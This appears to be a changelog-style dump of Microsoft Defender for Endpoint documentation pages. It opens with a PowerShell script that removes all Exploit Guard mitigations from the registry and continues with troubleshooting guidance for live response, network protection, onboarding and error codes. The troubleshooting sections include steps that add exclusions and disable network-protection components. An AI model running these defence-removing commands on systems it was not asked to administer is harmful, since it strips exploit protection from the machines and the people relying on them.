- Remove-ItemProperty -Path $Key.PSPath -Name "EAFModules" -ErrorAction Stop;
- }
-
- # Remove the FilterFullPath value if there is nothing else
- if (($Key.SubKeyCount -eq 0) -and ($Key.ValueCount -eq 1) -and ($Key.GetValue("FilterFullPath"))) {
- Remove-ItemProperty -Path $Key.PSPath -Name "FilterFullPath" -ErrorAction Stop;
- }
-
- # If the key is empty now, delete it
- if (($Key.SubKeyCount -eq 0) -and ($Key.ValueCount -eq 0)) {
- Write-Host "Removing empty Entry: " $Name
- Remove-Item -Path $Key.PSPath -ErrorAction Stop
- }
- }
- Catch {
- Write-Host "ERROR:" $_.Exception.Message "- at ($MitigationItemName)"
- }
- }
-
- # Delete all ExploitGuard ProcessMitigations
- function Remove-All-ProcessMitigations {
- if (!(Test-IsAdmin)) {
- throw "ERROR: No Administrator-Privileges detected!"; return
- }
-
- Get-ChildItem -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | ForEach-Object {
- $MitigationItem = $_;
- $MitigationItemName = $MitigationItem.PSChildName
-
- Try {
- Remove-ProcessMitigations $MitigationItem $MitigationItemName
-
- # "UseFilter" indicate full path filters may be present
- if ($MitigationItem.GetValue("UseFilter")) {
- Get-ChildItem -Path $MitigationItem.PSPath | ForEach-Object {
- $FullPathItem = $_
- if ($FullPathItem.GetValue("FilterFullPath")) {
- $Name = $MitigationItemName + "-" + $FullPathItem.GetValue("FilterFullPath")
- Write-Host "Removing FullPathEntry: " $Name
- Remove-ProcessMitigations $FullPathItem $Name
- }
-
- # If there are no subkeys now, we can delete the "UseFilter" value
- if ($MitigationItem.SubKeyCount -eq 0) {
- Remove-ItemProperty -Path $MitigationItem.PSPath -Name "UseFilter" -ErrorAction Stop
- }
- }
- }
- if (($MitigationItem.SubKeyCount -eq 0) -and ($MitigationItem.ValueCount -eq 0)) {
- Write-Host "Removing empty Entry: " $MitigationItemName
- Remove-Item -Path $MitigationItem.PSPath -ErrorAction Stop
- }
- }
- Catch {
- Write-Host "ERROR:" $_.Exception.Message "- at ($MitigationItemName)"
- }
- }
- }
-
- # Delete all ExploitGuard System-wide Mitigations
- function Remove-All-SystemMitigations {
-
- if (!(Test-IsAdmin)) {
- throw "ERROR: No Administrator-Privileges detected!"; return
- }
-
- $Kernel = Get-Item -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\kernel"
-
- Try {
- if ($Kernel.GetValue("MitigationOptions"))
- { Write-Host "Removing System MitigationOptions"
- Remove-ItemProperty -Path $Kernel.PSPath -Name "MitigationOptions" -ErrorAction Stop;
- }
- if ($Kernel.GetValue("MitigationAuditOptions"))
- { Write-Host "Removing System MitigationAuditOptions"
- Remove-ItemProperty -Path $Kernel.PSPath -Name "MitigationAuditOptions" -ErrorAction Stop;
- }
- } Catch {
- Write-Host "ERROR:" $_.Exception.Message "- System"
- }
- }
-
- Remove-All-ProcessMitigations
- Remove-All-SystemMitigations
- ```
-
-2. Create and import an XML configuration file with the following default mitigations, as described in Import, export, and deploy Exploit Protection configurations:
-
- ```xml
- <?xml version="1.0" encoding="UTF-8"?>
- <root>
- <SystemConfig/>
- <AppConfig Executable="ExtExport.exe">
- <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
- </AppConfig>
- <AppConfig Executable="ie4uinit.exe">
- <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
- </AppConfig>
- <AppConfig Executable="ieinstal.exe">
- <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
- </AppConfig>
- <AppConfig Executable="ielowutil.exe">
- <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
- </AppConfig>
- <AppConfig Executable="ieUnatt.exe">
- <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
- </AppConfig>
- <AppConfig Executable="iexplore.exe">
- <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
- </AppConfig>
- <AppConfig Executable="mscorsvw.exe">
- <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
- </AppConfig>
- <AppConfig Executable="msfeedssync.exe">
- <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
- </AppConfig>
- <AppConfig Executable="mshta.exe">
- <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true"/>
- </AppConfig>
- <AppConfig Executable="ngen.exe">
- <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
- </AppConfig>
- <AppConfig Executable="ngentask.exe">
- <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
- </AppConfig>
- <AppConfig Executable="PresentationHost.exe">
- <DEP Enable="true" OverrideDEP="false" EmulateAtlThunks="false"/>
- <ASLR OverrideForceRelocateImages="false" ForceRelocateImages="false" Enable="true" OverrideBottomUp="false" HighEntropy="true" BottomUp="true"/>
- <SEHOP Enable="true" OverrideSEHOP="false" TelemetryOnly="false"/>
- <Heap OverrideHeap="false" TerminateOnError="true"/>
- </AppConfig>
- <AppConfig Executable="PrintDialog.exe">
- <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
- </AppConfig>
- <AppConfig Executable="PrintIsolationHost.exe"/>
- <AppConfig Executable="runtimebroker.exe">
- <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
- </AppConfig>
- <AppConfig Executable="splwow64.exe"/>
- <AppConfig Executable="spoolsv.exe"/>
- <AppConfig Executable="svchost.exe"/>
- <AppConfig Executable="SystemSettings.exe">
- <ExtensionPoints OverrideExtensionPoint="false" DisableExtensionPoints="true"/>
- </AppConfig>
- </root>
- ```
-
-If you haven't already, it's a good idea to download and use the [Windows Security Baselines](/windows/device-security/windows-security-baselines) to complete your Exploit protection customization.
-
-## Related topics
-
-* [Protect devices from exploits](exploit-protection.md)
-* [Evaluate exploit protection](evaluate-exploit-protection.md)
-* [Enable exploit protection](enable-exploit-protection.md)
-* [Configure and audit exploit protection mitigations](customize-exploit-protection.md)
-* [Import, export, and deploy exploit protection configurations](import-export-exploit-protection-emet-xml.md)
security Troubleshoot Live Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-live-response.md
- Title: Troubleshoot Microsoft Defender for Endpoint live response issues
-description: Troubleshoot issues that might arise when using live response in Microsoft Defender for Endpoint.
------- m365-security-- tier3-- mde-edr-- Previously updated : 02/16/2024--
-# Troubleshoot Microsoft Defender for Endpoint live response issues
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
-
-This page provides detailed steps to troubleshoot live response issues.
-
-## File can't be accessed during live response sessions
-
-If while trying to take an action during a live response session, you encounter an error message stating that the file can't be accessed, take the following steps to address the issue.
-
-1. Copy the following script code snippet and save it as a PS1 file:
-
- ```powershell
- $copied_file_path=$args[0]
- $action=Copy-Item $copied_file_path -Destination $env:TEMP -PassThru -ErrorAction silentlyContinue
-
- if ($action){
- Write-Host "You copied the file specified in $copied_file_path to $env:TEMP Successfully"
- }
-
- else{
- Write-Output "Error occurred while trying to copy a file, details:"
- Write-Output $error[0].exception.message
-
- }
- ```
-
-2. Add the script to the live response library.
-3. Run the script with one parameter: the file path of the file to be copied.
-4. Navigate to your TEMP folder.
-5. Run the action you wanted to take on the copied file.
-
-## Slow live response sessions or delays during initial connections
-
-Live response uses Defender for Endpoint sensor registration with WNS service in Windows. If you're having connectivity issues with live response, confirm the following details:
-
-1. WpnService (Windows Push Notifications System Service) isn't disabled.
-
-2. WpnService connectivity with WNS cloud isn't disabled via group policy or MDM setting. ['Turn off notifications network usage'](/windows/client-management/mdm/policy-csp-notifications) shouldn't be set to `1`.
-
-Refer to the following articles to fully understand the WpnService service behavior and requirements:
--- [Windows Push Notification Services (WNS) overview](/windows/uwp/design/shell/tiles-and-notifications/windows-push-notification-services--wns--overview)-- [Enterprise Firewall and Proxy Configurations to Support WNS Traffic](/windows/uwp/design/shell/tiles-and-notifications/firewall-allowlist-config)-- [Microsoft Push Notifications Service (MPNS) Public IP ranges](https://www.microsoft.com/download/details.aspx?id=44535)
security Troubleshoot Mdatp https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-mdatp.md
- Title: Troubleshoot Microsoft Defender for Endpoint service issues
-description: Find solutions and workarounds to known issues such as server errors when trying to access the service.
------- m365-security-- tier3- Previously updated : 12/18/2020--
-# Troubleshoot service issues
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
-
-This section addresses issues that might arise as you use the Microsoft Defender for Endpoint service.
-
-## Server error - Access is denied due to invalid credentials
-
-If you encounter a server error when trying to access the service, you need to change your browser cookie settings.
-Configure your browser to allow cookies.
-
-## Elements or data missing on the portal
-
-If some elements or data is missing on Microsoft Defender XDR, it's possible that proxy settings are blocking it.
-
-Make sure that `*.security.microsoft.com` is included the proxy allowlist.
-
-> [!NOTE]
-> You must use the HTTPS protocol when adding the following endpoints.
-
-## Microsoft Defender for Endpoint service shows event or error logs in the Event Viewer
-
-See [Review events and errors using Event Viewer](event-error-codes.md) for a list of event IDs that are reported by the Microsoft Defender for Endpoint service. The article also contains troubleshooting steps for event errors.
-
-## Microsoft Defender for Endpoint service fails to start after a reboot and shows error 577
-
-If onboarding devices successfully completes but Microsoft Defender for Endpoint doesn't start after a reboot and shows error 577, check that Windows Defender isn't disabled by a policy.
-
-For more information, see [Ensure that Microsoft Defender Antivirus is not disabled by policy](troubleshoot-onboarding.md#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy).
-
-## Known issues with regional formats
-
-### Date and time formats
-
-There are some known issues with the time and date formats.
-
-The following date formats are supported:
--- MM/dd/yyyy-- dd/MM/yyyy-
-The following date and time formats are currently not supported:
--- Date format yyyy/MM/dd-- Date format dd/MM/yy-- Date format with yy. Will only show yyyy.-- Time format HH:mm:ss isn't supported (the 12 hour AM/PM format isn't supported). Only the 24-hour format is supported.-
-### Use of comma to indicate thousand
-
-Support of use of comma as a separator in numbers aren't supported. Regions where a number is separated with a comma to indicate a thousand, will only see the use of a dot as a separator. For example, 15,5 K is displayed as 15.5 K.
-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-troubleshoot-belowfoldlink)
-
-## Microsoft Defender for Endpoint tenant was automatically created in Europe
-
-When you use Microsoft Defender for Cloud to monitor servers, a Microsoft Defender for Endpoint tenant is automatically created. The Microsoft Defender for Endpoint data is stored in Europe by default.
-
-## Related topics
--- [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md)-- [Review events and errors using Event Viewer](event-error-codes.md)
security Troubleshoot Np https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-np.md
- Title: Troubleshoot problems with Network protection
-description: Resources and sample code to troubleshoot issues with Network protection in Microsoft Defender for Endpoint.
---------- m365-security-- tier3-- mde-asr Previously updated : 03/03/2024--
-# Troubleshoot network protection
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business?branch=main)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> [!TIP]
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
-
-This article provides troubleshooting information for [network protection](network-protection.md), in cases, such as:
--- Network protection blocks a website that is safe (false positive)-- Network protection fails to block a suspicious or known malicious website (false negative)-
-There are four steps to troubleshooting these problems:
-
-1. Confirm prerequisites
-2. Use audit mode to test the rule
-3. Add exclusions for the specified rule (for false positives)
-4. Submit support logs
-
-## Confirm prerequisites
-
-Network protection works on devices with the following conditions:
-
-> [!div class="checklist"]
-> > - Endpoints are running Windows 10 Pro or Enterprise edition, version 1709 or higher.
-> - Endpoints are using Microsoft Defender Antivirus as the sole antivirus protection app. [See what happens when you're using a non-Microsoft antivirus solution](/windows/security/threat-protection/microsoft-defender-antivirus/microsoft-defender-antivirus-compatibility).
-> - [Real-time protection](/windows/security/threat-protection/microsoft-defender-antivirus/configure-real-time-protection-microsoft-defender-antivirus) is enabled.
-> - [Behavior Monitoring](/microsoft-365/security/defender-endpoint/behavior-monitor) is enabled.
-> - [Cloud-delivered protection](/windows/security/threat-protection/microsoft-defender-antivirus/enable-cloud-protection-microsoft-defender-antivirus) is enabled.
-> - [Cloud Protection network connectivity](/microsoft-365/security/defender-endpoint/configure-network-connections-microsoft-defender-antivirus) is functional.
-> - Audit mode isn't enabled. Use [Group Policy](enable-network-protection.md#group-policy) to set the rule to **Disabled** (value: **0**).
-
-## Use audit mode
-
-You can enable network protection in audit mode and then visit a website designed to demo the feature. All website connections are allowed by network protection but an event is logged to indicate any connection that would be blocked if network protection were enabled.
-
-1. Set network protection to **Audit mode**.
-
- ```PowerShell
- Set-MpPreference -EnableNetworkProtection AuditMode
- ```
-
-2. Perform the connection activity that is causing an issue (for example, attempt to visit the site, or connect to the IP address you do or don't want to block).
-
-3. [Review the network protection event logs](network-protection.md#review-network-protection-events-in-windows-event-viewer) to see if the feature would block the connection if it were set to **Enabled**.
-
- If network protection isn't blocking a connection that you're expecting it should block, enable the feature.
-
- ```PowerShell
- Set-MpPreference -EnableNetworkProtection Enabled
- ```
-
-## Report a false positive or false negative
-
-If you've tested the feature with the demo site and with audit mode, and network protection is working on preconfigured scenarios, but isn't working as expected for a specific connection, use the [Windows Defender Security Intelligence web-based submission form](https://www.microsoft.com/wdsi/filesubmission) to report a false negative or false positive for network protection. With an E5 subscription, you can also [provide a link to any associated alert](alerts-queue.md).
-
-See [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md).
-
-## Add exclusions
-
-The current exclusion options are:
-
-1. Setting up a custom allow indicator.
-
-2. Using IP exclusions: `Add-MpPreference -ExclusionIpAddress 192.168.1.1`.
-
-3. Excluding an entire process. For more information, see [Microsoft Defender Antivirus exclusions](configure-exclusions-microsoft-defender-antivirus.md).
-
-## Network Performance issues
-
-In certain circumstances, a network protections component might contribute to slow network connections to Domain Controllers and/or Exchange servers. You might also notice Event ID 5783 NETLOGON errors.
-
-To attempt to solve these issues, change Network Protection from ΓÇÿblock modeΓÇÖ to either ΓÇÿ[audit mode](troubleshoot-np.md)ΓÇÖ or 'disabled'. If your network issues are fixed, follow the next steps to find out which component in Network Protection is contributing to the behavior.
-
-Disable the following components in order and test your network connectivity performance after disabling each one:
-
-1. [Disable Datagram Processing on Windows Server](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-1. [Disable Network Protection Perf Telemetry](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-1. [Disable FTP parsing](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-1. [Disable SSH parsing](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-1. [Disable RDP parsing](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-1. [Disable HTTP parsing](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-1. [Disable SMTP parsing](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-1. [Disable DNS over TCP parsing](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-1. [Disable DNS parsing ](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-1. [Disable inbound connection filtering](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-1. [Disable TLS parsing](/powershell/module/defender/set-mppreference?view=windowsserver2022-ps&preserve-view=true)
-
-If your network performance issues persist after following these troubleshooting steps, then they're probably not related to network protection and you should look for other causes of your network performance issues.
-
-## Collect diagnostic data for file submissions
-
-When you report a problem with network protection, you're asked to collect and submit diagnostic data for Microsoft support and engineering teams to help troubleshoot issues.
-
-1. Open an elevated command prompt and change to the Windows Defender directory:
-
- ```console
- cd c:\program files\windows defender
- ```
-
-2. Run this command to generate the diagnostic logs:
-
- ```console
- mpcmdrun -getfiles
- ```
-
-3. Attach the file to the submission form. By default, diagnostic logs are saved at `C:\ProgramData\Microsoft\Windows Defender\Support\MpSupportFiles.cab`.
-
-## Resolve connectivity issues with network protection (for E5 customers)
-
-Due to the environment where network protection runs, Microsoft is unable to see your operating system proxy settings. In some cases, network protection clients are unable to reach the cloud service. To resolve connectivity issues with network protection, configure one of the following registry keys so that network protection becomes aware of the proxy configuration:
-
-```powershell
-Set-MpPreference -ProxyServer <proxy IP address: Port>
-```
-
-OR
-
-```powershell
-Set-MpPreference -ProxyPacUrl <Proxy PAC url>
-```
-
-You can configure the registry key by using PowerShell, Microsoft Configuration Manager, or Group Policy. Here are some resources to help:
--- [Working with Registry Keys](/powershell/scripting/samples/working-with-registry-keys)-- [Configure custom client settings for Endpoint Protection](/mem/configmgr/protect/deploy-use/endpoint-protection-configure-client)-- [Use Group Policy settings to manage Endpoint Protection](/mem/configmgr/protect/deploy-use/endpoint-protection-group-policies)-
-## See also
--- [Network protection](network-protection.md)-- [Network protection and the TCP three-way handshake](network-protection.md#network-protection-and-the-tcp-three-way-handshake)-- [Evaluate network protection](evaluate-network-protection.md)-- [Enable network protection](enable-network-protection.md)-- [Address false positives/negatives in Defender for Endpoint](defender-endpoint-false-positives-negatives.md)-
security Troubleshoot Onboarding Error Messages https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-onboarding-error-messages.md
- Title: Troubleshoot onboarding issues and error messages
-description: Troubleshoot onboarding issues and error message while completing setup of Microsoft Defender for Endpoint.
------- m365-security-- tier3-- Previously updated : 12/18/2020--
-# Troubleshoot subscription and portal access issues
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-troublshootonboarding-abovefoldlink)
-
-This page provides detailed steps to troubleshoot issues that might occur when setting up your Microsoft Defender for Endpoint service.
-
-If you receive an error message, Microsoft Defender XDR will provide a detailed explanation on what the issue is and relevant links will be supplied.
-
-## No subscriptions found
-
-If while accessing Microsoft Defender XDR you get a **No subscriptions found** message, it means the Microsoft Entra ID used to log in the user to the portal, does not have a Microsoft Defender for Endpoint license.
-
-Potential reasons:
--- The Windows E5 and Office E5 licenses are separate licenses.-- The license was purchased but not provisioned to this Microsoft Entra instance.
- - It could be a license provisioning issue.
- - It could be you inadvertently provisioned the license to a different Microsoft Entra ID than the one used for authentication into the service.
-
-For both cases, you should contact Microsoft support at [General Microsoft Defender for Endpoint Support](https://support.microsoft.com/getsupport?wf=0&tenant=ClassicCommercial&oaspworkflow=start_1.0.0.0&locale=en-us&supportregion=en-us&pesid=16055&ccsid=636419533611396913) or
-[Volume license support](https://www.microsoft.com/licensing/servicecenter/Help/Contact.aspx).
--
-## Your subscription has expired
-
-If while accessing Microsoft Defender XDR you get a **Your subscription has expired** message, your online service subscription has expired. Microsoft Defender for Endpoint subscription, like any other online service subscription, has an expiration date.
-
-You can choose to renew or extend the license at any point in time. When accessing the portal after the expiration date a **Your subscription has expired** message will be presented with an option to download the device offboarding package, should you choose to not renew the license.
-
-> [!NOTE]
-> For security reasons, the package used to Offboard devices will expire 30 days after the date it was downloaded. Expired offboarding packages sent to a device will be rejected. When downloading an offboarding package you will be notified of the packages expiry date and it will also be included in the package name.
--
-## You are not authorized to access the portal
-
-If you receive a **You are not authorized to access the portal**, be aware that Microsoft Defender for Endpoint is a security monitoring, incident investigation and response product, and as such, access to it is restricted and controlled by the user.
-For more information, see, [**Assign user access to the portal**](/windows/threat-protection/windows-defender-atp/assign-portal-access-windows-defender-advanced-threat-protection).
--
-## Data currently isn't available on some sections of the portal
-
-If the portal dashboard and other sections show an error message such as "Data currently isn't available":
--
-You'll need to allow the `security.windows.com` and all subdomains under it on your web browser. For example, `*.security.windows.com`.
-
-## Portal communication issues
-
-If you encounter issues with accessing the portal, missing data, or restricted access to portions of the portal, you'll need to verify that the following URLs are allowed and open for communication.
--- `*.blob.core.windows.net`-- `crl.microsoft.com`-- `https://*.microsoftonline-p.com`-- `https://*.security.microsoft.com`-- `https://automatediracs-eus-prd.security.microsoft.com`-- `https://login.microsoftonline.com`-- `https://login.windows.net`-- `https://onboardingpackagescusprd.blob.core.windows.net`-- `https://secure.aadcdn.microsoftonline-p.com`-- `https://security.microsoft.com`-- `https://static2.sharepointonline.com`
security Troubleshoot Onboarding https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/troubleshoot-onboarding.md
- Title: Troubleshoot Microsoft Defender for Endpoint onboarding issues
-description: Troubleshoot issues that might arise during the onboarding of devices or to the Microsoft Defender for Endpoint service.
------- m365-security-- tier3-- Previously updated : 04/01/2024--
-# Troubleshoot Microsoft Defender for Endpoint onboarding issues
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Windows Server 2012 R2-- Windows Server 2016-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
-
-You might need to troubleshoot the Microsoft Defender for Endpoint onboarding process if you encounter issues.
-This page provides detailed steps to troubleshoot onboarding issues that might occur when deploying with one of the deployment tools and common errors that might occur on the devices.
-
-Before you start troubleshooting issues with onboarding tools, it's important to check if the minimum requirements are met for onboarding devices to the services. [Learn about the licensing, hardware, and software requirements to onboard devices to the service](minimum-requirements.md).
-
-## Troubleshoot issues with onboarding tools
-
-If you've completed the onboarding process and don't see devices in the [Devices list](investigate-machines.md) after an hour, it might indicate an onboarding or connectivity problem.
-
-### Troubleshoot onboarding when deploying with Group Policy
-
-Deployment with Group Policy is done by running the onboarding script on the devices. The Group Policy console doesn't indicate if the deployment has succeeded or not.
-
-If you've completed the onboarding process and don't see devices in the [Devices list](investigate-machines.md) after an hour, you can check the output of the script on the devices. For more information, see [Troubleshoot onboarding when deploying with a script](#troubleshoot-onboarding-when-deploying-with-a-script).
-
-If the script completes successfully, see [Troubleshoot onboarding issues on the devices](#troubleshoot-onboarding-issues-on-the-device) for additional errors that might occur.
-
-### Troubleshoot onboarding issues when deploying with Microsoft Endpoint Configuration Manager
-
-When onboarding devices using the following versions of Configuration
--- Microsoft Endpoint Configuration Manager-- System Center 2012 Configuration Manager-- System Center 2012 R2 Configuration Manager-
-Deployment with the above-mentioned versions of Configuration Manager is done by running the onboarding script on the devices. You can track the deployment in the Configuration Manager Console.
-
-If the deployment fails, you can check the output of the script on the devices.
-
-If the onboarding completed successfully but the devices aren't showing up in the **Devices list** after an hour, see [Troubleshoot onboarding issues on the device](#troubleshoot-onboarding-issues-on-the-device) for additional errors that might occur.
-
-### Troubleshoot onboarding when deploying with a script
-
-**Check the result of the script on the device:**
-
-1. Click **Start**, type **Event Viewer**, and press **Enter**.
-
-2. Go to **Windows Logs** \> **Application**.
-
-3. Look for an event from **WDATPOnboarding** event source.
-
-If the script fails and the event is an error, you can check the event ID in the following table to help you troubleshoot the issue.
-
-> [!NOTE]
-> The following event IDs are specific to the onboarding script only.
-
-|Event ID|Error Type|Resolution steps|
-|::|||
-|`5`|Offboarding data was found but couldn't be deleted|Check the permissions on the registry, specifically <p> `HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection`.|
-|`10`|Onboarding data couldn't be written to registry|Check the permissions on the registry, specifically <p> `HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection`. <p> Verify that the script has been run as an administrator.|
-|`15`|Failed to start SENSE service|Check the service health (`sc query sense` command). Make sure it's not in an intermediate state (*'Pending_Stopped'*, *'Pending_Running'*) and try to run the script again (with administrator rights). <p> If the device is running Windows 10, version 1607 and running the command `sc query sense` returns `START_PENDING`, reboot the device. If rebooting the device doesn't address the issue, upgrade to KB4015217 and try onboarding again.|
-|`15`|Failed to start SENSE service|If the message of the error is: System error 577 or error 1058 has occurred, you need to enable the Microsoft Defender Antivirus ELAM driver, see [Ensure that Microsoft Defender Antivirus is not disabled by a policy](#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy) for instructions.|
-|`30`|The script failed to wait for the service to start running|The service could have taken more time to start or has encountered errors while trying to start. For more information on events and errors related to SENSE, see [Review events and errors using Event viewer](event-error-codes.md).|
-|`35`|The script failed to find needed onboarding status registry value|When the SENSE service starts for the first time, it writes onboarding status to the registry location <p> `HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status`. <p> The script failed to find it after several seconds. You can manually test it and check if it's there. For more information on events and errors related to SENSE, see [Review events and errors using Event viewer](event-error-codes.md).|
-|`40`|SENSE service onboarding status isn't set to **1**|The SENSE service has failed to onboard properly. For more information on events and errors related to SENSE, see [Review events and errors using Event viewer](event-error-codes.md).|
-|`65`|Insufficient privileges|Run the script again with administrator privileges.|
-|`70`|Offboarding script is for a different organization|Get an offboarding script for the correct organization that the SENSE service is onboarded to.|
-
-### Troubleshoot onboarding issues using Microsoft Intune
-
-You can use Microsoft Intune to check error codes and attempt to troubleshoot the cause of the issue.
-
-If you have configured policies in Intune and they aren't propagated on devices, you might need to configure automatic MDM enrollment.
-
-Use the following tables to understand the possible causes of issues while onboarding:
--- Microsoft Intune error codes and OMA-URIs table-- Known issues with non-compliance table-- Mobile Device Management (MDM) event logs table-
-If none of the event logs and troubleshooting steps work, download the Local script from the **Device management** section of the portal, and run it in an elevated command prompt.
-
-#### Microsoft Intune error codes and OMA-URIs
-
-|Error Code Hex|Error Code Dec|Error Description|OMA-URI|Possible cause and troubleshooting steps|
-|::|||||
-|0x87D1FDE8|-2016281112|Remediation failed|Onboarding <p> Offboarding|**Possible cause:** Onboarding or offboarding failed on a wrong blob: wrong signature or missing PreviousOrgIds fields. <p> **Troubleshooting steps:** <p> Check the event IDs in the [View agent onboarding errors in the device event log](#view-agent-onboarding-errors-in-the-device-event-log) section. <p> Check the MDM event logs in the following table or follow the instructions in [Diagnose MDM failures in Windows](/windows/client-management/mdm/diagnose-mdm-failures-in-windows-10).|
-||||Onboarding <p> Offboarding <p> SampleSharing|**Possible cause:** Microsoft Defender for Endpoint Policy registry key doesn't exist or the OMA DM client doesn't have permissions to write to it. <p> **Troubleshooting steps:** Ensure that the following registry key exists: `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection` <p> If it doesn't exist, open an elevated command and add the key.|
-||||SenseIsRunning <p> OnboardingState <p> OrgId|**Possible cause:** An attempt to remediate by read-only property. Onboarding has failed. <p> **Troubleshooting steps:** Check the troubleshooting steps in [Troubleshoot onboarding issues on the device](#troubleshoot-onboarding-issues-on-the-device). <p> Check the MDM event logs in the following table or follow the instructions in [Diagnose MDM failures in Windows](/windows/client-management/mdm/diagnose-mdm-failures-in-windows-10).|
-||||All|**Possible cause:** Attempt to deploy Microsoft Defender for Endpoint on non-supported SKU/Platform, particularly Holographic SKU. <p> Currently supported platforms: <p> Enterprise, Education, and Professional.<p> Server isn't supported.|
-|0x87D101A9|-2016345687|SyncML(425): The requested command failed because the sender doesn't have adequate access control permissions (ACL) on the recipient.|All|**Possible cause:** Attempt to deploy Microsoft Defender for Endpoint on non-supported SKU/Platform, particularly Holographic SKU.<p> Currently supported platforms: <p> Enterprise, Education, and Professional.|
-
-#### Known issues with non-compliance
-
-The following table provides information on issues with non-compliance and how you can address the issues.
-
